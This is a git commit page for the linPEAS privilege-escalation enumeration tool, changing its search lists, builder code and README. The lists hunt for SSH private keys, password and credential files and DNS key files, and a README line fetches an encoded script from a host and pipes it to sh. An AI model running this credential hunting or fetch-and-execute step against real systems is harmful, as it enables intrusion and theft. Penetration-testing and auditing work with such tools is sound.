darnellkeith/PEASS-ng
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

linpeas

Browse Source
This commit is contained in:
Carlos Polop 2021-06-21 00:26:11 +02:00
parent c2c7604f89
commit 4d7cc5d461
5 changed files with 58 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

36
build_lists/sensitive_files.yaml
View File

@ -60,6 +60,8 @@ common_directory_folders:
- /usr - /usr
- /var - /var
peas_extrasections_markup: "peass{EXTRA_SECTIONS}"
peas_finds_markup: "peass{FINDS_HERE}" peas_finds_markup: "peass{FINDS_HERE}"
find_line_markup: "peass{FIND_PARAMS_HERE}" find_line_markup: "peass{FIND_PARAMS_HERE}"
find_template: > find_template: >
@ -496,7 +498,7 @@ search:
SSH_FILES: SSH_FILES:
config: config:
auto_check: False auto_check: True
files: files:
? "id_dsa*" ? "id_dsa*"
@ -525,6 +527,7 @@ search:
? "authorized_keys" ? "authorized_keys"
: :
good_regex: 'from=[\w\._\-]+'
type: f type: f
search_in: search_in:
- common - common
@ -1538,6 +1541,27 @@ search:
search_in: search_in:
- common - common
Bind:
config:
auto_check: True
files:
? "bind"
:
files:
? "*"
:
just_list_file: True
? "*.key"
:
bad_regex: ".*"
remove_empty_lines: True
remove_regex: "^#"
type: d
search_in:
- common
Interesting logs: Interesting logs:
config: config:
auto_check: True auto_check: True
@ -2031,18 +2055,28 @@ search:
files: files:
? "*password*" ? "*password*"
: :
just_list_file: True
type: f type: f
search_in: search_in:
- common - common
? "*credential*" ? "*credential*"
: :
just_list_file: True
type: f type: f
search_in: search_in:
- common - common
? "creds*" ? "creds*"
: :
just_list_file: True
type: f
search_in:
- common
? "*.key"
:
just_list_file: True
type: f type: f
search_in: search_in:
- common - common

8
linPEAS/README.md
View File

@ -49,8 +49,6 @@ sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim
``` ```
**Use the parameter `-a` to execute all these checks.**
## MacPEAS ## MacPEAS
Just execute `linpeas.sh` in a MacOS system and the **MacPEAS version will be automatically executed!!** Just execute `linpeas.sh` in a MacOS system and the **MacPEAS version will be automatically executed!!**
@ -78,7 +76,7 @@ By default linpeas takes around **2 mins** to complete, but It could take from *
This script has **several lists** included inside of it to be able to **color the results** in order to highlight PE vector. This script has **several lists** included inside of it to be able to **color the results** in order to highlight PE vector.
LinPEAS also **exports a new PATH** variable during the execution if common folders aren't present in the original PATH variable. It also **exports and unset** some environmental variables during the execution so no command executed during the session will be saved in the history file (you can avoid this actions using the parameter **-n**). LinPEAS also **exports a new PATH** variable during the execution if common folders aren't present in the original PATH variable.
![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/help.png) ![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/help.png)
@ -147,9 +145,9 @@ Here you have an old linpe version script in one line, **just copy and paste it*
**The color filtering is not available in the one-liner** (the lists are too big) **The color filtering is not available in the one-liner** (the lists are too big)
This one-liner is deprecated (I am not going to update it more), but it could be useful in some cases so it will remain here: This one-liner is deprecated (I'm not going to update it any more), but it could be useful in some cases so it will remain here.
The default file where all the data is recorded is: */tmp/linPE* (you can change it at the beginning of the script) The default file where all the data is stored is: */tmp/linPE* (you can change it at the beginning of the script)
```sh ```sh

16
linPEAS/builder/linpeas_base.sh
View File

@ -470,9 +470,9 @@ profiledG="01-locale-fix.sh|256term.csh|256term.sh|abrt-console-notification.sh|
knw_emails=".*@aivazian.fsnet.co.uk|.*@angband.pl|.*@canonical.com|.*centos.org|.*debian.net|.*debian.org|.*@jff.email|.*kali.org|.*linux.it|.*@linuxia.de|.*@lists.debian-maintainers.org|.*@mit.edu|.*@oss.sgi.com|.*@qualcomm.com|.*redhat.com|.*ubuntu.com|.*@vger.kernel.org|rogershimizu@gmail.com|thmarques@gmail.com" knw_emails=".*@aivazian.fsnet.co.uk|.*@angband.pl|.*@canonical.com|.*centos.org|.*debian.net|.*debian.org|.*@jff.email|.*kali.org|.*linux.it|.*@linuxia.de|.*@lists.debian-maintainers.org|.*@mit.edu|.*@oss.sgi.com|.*@qualcomm.com|.*redhat.com|.*ubuntu.com|.*@vger.kernel.org|rogershimizu@gmail.com|thmarques@gmail.com"
timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ureadahead-stop.timer" timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ua-messaging.timer|ureadahead-stop.timer"
commonrootdirsG="^/$|/bin$|/boot$|/.cache$|/cdrom|/dev$|/etc$|/home$|/lost+found$|/lib$|/lib64$|/media$|/mnt$|/opt$|/proc$|/root$|/run$|/sbin$|/snap$|/srv$|/sys$|/tmp$|/usr$|/var$" commonrootdirsG="^/$|/bin$|/boot$|/.cache$|/cdrom|/dev$|/etc$|/home$|/lost+found$|/lib$|/lib32$|libx32$|/lib64$|lost\+found|/media$|/mnt$|/opt$|/proc$|/root$|/run$|/sbin$|/snap$|/srv$|/sys$|/tmp$|/usr$|/var$"
commonrootdirsMacG="^/$|/.DocumentRevisions-V100|/.fseventsd|/.PKInstallSandboxManager-SystemSoftware|/.Spotlight-V100|/.Trashes|/.vol|/Applications|/bin|/cores|/dev|/home|/Library|/macOS Install Data|/net|/Network|/opt|/private|/sbin|/System|/Users|/usr|/Volumes" commonrootdirsMacG="^/$|/.DocumentRevisions-V100|/.fseventsd|/.PKInstallSandboxManager-SystemSoftware|/.Spotlight-V100|/.Trashes|/.vol|/Applications|/bin|/cores|/dev|/home|/Library|/macOS Install Data|/net|/Network|/opt|/private|/sbin|/System|/Users|/usr|/Volumes"
ldsoconfdG="/lib32|/lib/x86_64-linux-gnu|/usr/lib32|/usr/lib/oracle/19.6/client64/lib/|/usr/lib/x86_64-linux-gnu/libfakeroot|/usr/lib/x86_64-linux-gnu|/usr/local/lib/x86_64-linux-gnu|/usr/local/lib" ldsoconfdG="/lib32|/lib/x86_64-linux-gnu|/usr/lib32|/usr/lib/oracle/19.6/client64/lib/|/usr/lib/x86_64-linux-gnu/libfakeroot|/usr/lib/x86_64-linux-gnu|/usr/local/lib/x86_64-linux-gnu|/usr/local/lib"
@ -547,7 +547,7 @@ print_title(){
END_T2_TIME=`date +%s 2>/dev/null` END_T2_TIME=`date +%s 2>/dev/null`
if [ "$START_T2_TIME" ]; then if [ "$START_T2_TIME" ]; then
TOTAL_T2_TIME=$(($END_T2_TIME - $START_T2_TIME)) TOTAL_T2_TIME=$(($END_T2_TIME - $START_T2_TIME))
printf $DG"The section execution took $TOTAL_T2_TIME seconds\n"$NC printf $DG"This check took $TOTAL_T2_TIME seconds\n"$NC
fi fi
END_T1_TIME=`date +%s 2>/dev/null` END_T1_TIME=`date +%s 2>/dev/null`
@ -1404,8 +1404,8 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then
crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
command -v incrontab 2>/dev/null || echo_not_found "incrontab" command -v incrontab 2>/dev/null || echo_not_found "incrontab"
incrontab -l 2>/dev/null incrontab -l 2>/dev/null
ls -al /etc/cron* 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g"
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs /var/spool/cron/crontabs/* /var/spool/anacron /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
crontab -l -u "$USER" 2>/dev/null | tr -d "\r" crontab -l -u "$USER" 2>/dev/null | tr -d "\r"
ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ 2>/dev/null #MacOS paths ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ 2>/dev/null #MacOS paths
echo "" echo ""
@ -1971,9 +1971,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
hostsdenied="`ls /etc/hosts.denied 2>/dev/null`" hostsdenied="`ls /etc/hosts.denied 2>/dev/null`"
hostsallow="`ls /etc/hosts.allow 2>/dev/null`" hostsallow="`ls /etc/hosts.allow 2>/dev/null`"
if [ "$PSTORAGE_SSH_FILES" ]; then peass{SSH_FILES}
printf "$PSTORAGE_SSH_FILES\n"
fi
grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED},"
@ -2337,6 +2335,8 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
peass{FTP} peass{FTP}
peass{EXTRA_SECTIONS}
peass{Interesting logs} peass{Interesting logs}
peass{Windows Files} peass{Windows Files}

13
linPEAS/builder/src/linpeasBuilder.py
View File

@ -15,6 +15,7 @@ from .yamlGlobals import (
FIND_LINE_MARKUP, FIND_LINE_MARKUP,
STORAGE_LINE_MARKUP, STORAGE_LINE_MARKUP,
STORAGE_LINE_EXTRA_MARKUP, STORAGE_LINE_EXTRA_MARKUP,
EXTRASECTIONS_MARKUP
) )
@ -42,7 +43,7 @@ class LinpeasBuilder:
#Replace interesting hidden files markup for a list of all the serched hidden files #Replace interesting hidden files markup for a list of all the serched hidden files
self.__replace_mark(INT_HIDDEN_FILES_MARKUP, self.hidden_files, "|") self.__replace_mark(INT_HIDDEN_FILES_MARKUP, self.hidden_files, "|")
#Check if there are duplecate peass marks #Check if there are duplicate peass marks
peass_marks = self.__get_peass_marks() peass_marks = self.__get_peass_marks()
for i,mark in enumerate(peass_marks): for i,mark in enumerate(peass_marks):
for j in range(i+1,len(peass_marks)): for j in range(i+1,len(peass_marks)):
@ -52,8 +53,12 @@ class LinpeasBuilder:
sections = self.__generate_sections() sections = self.__generate_sections()
for section_name, bash_lines in sections.items(): for section_name, bash_lines in sections.items():
mark = "peass{"+section_name+"}" mark = "peass{"+section_name+"}"
assert mark in peass_marks, f"Mark {mark} wasn't found in linpeas base" if mark in peass_marks:
self.__replace_mark(mark, list(bash_lines), "") self.__replace_mark(mark, list(bash_lines), "")
else:
self.__replace_mark(EXTRASECTIONS_MARKUP, [bash_lines, EXTRASECTIONS_MARKUP], "\n\n")
self.__replace_mark(EXTRASECTIONS_MARKUP, list(""), "") #Delete extra markup
#Check that there aren peass marks left in linpeas #Check that there aren peass marks left in linpeas
peass_marks = self.__get_peass_marks() peass_marks = self.__get_peass_marks()
@ -153,7 +158,7 @@ class LinpeasBuilder:
for precord in self.ploaded.peasrecords: for precord in self.ploaded.peasrecords:
if precord.auto_check: if precord.auto_check:
section = f' print_2title "Analizing {precord.name} Files (limit 70)"\n' section = f' print_2title "Analizing {precord.name.replace("_"," ")} Files (limit 70)"\n'
for exec_line in precord.exec: for exec_line in precord.exec:
if exec_line: if exec_line:

4
linPEAS/builder/src/yamlGlobals.py
View File

@ -27,4 +27,6 @@ STORAGE_LINE_MARKUP = YAML_LOADED["storage_line_markup"]
STORAGE_LINE_EXTRA_MARKUP = YAML_LOADED["storage_line_extra_markup"] STORAGE_LINE_EXTRA_MARKUP = YAML_LOADED["storage_line_extra_markup"]
STORAGE_TEMPLATE = YAML_LOADED["storage_template"] STORAGE_TEMPLATE = YAML_LOADED["storage_template"]
INT_HIDDEN_FILES_MARKUP = YAML_LOADED["int_hidden_files_markup"] INT_HIDDEN_FILES_MARKUP = YAML_LOADED["int_hidden_files_markup"]
EXTRASECTIONS_MARKUP = YAML_LOADED["peas_extrasections_markup"]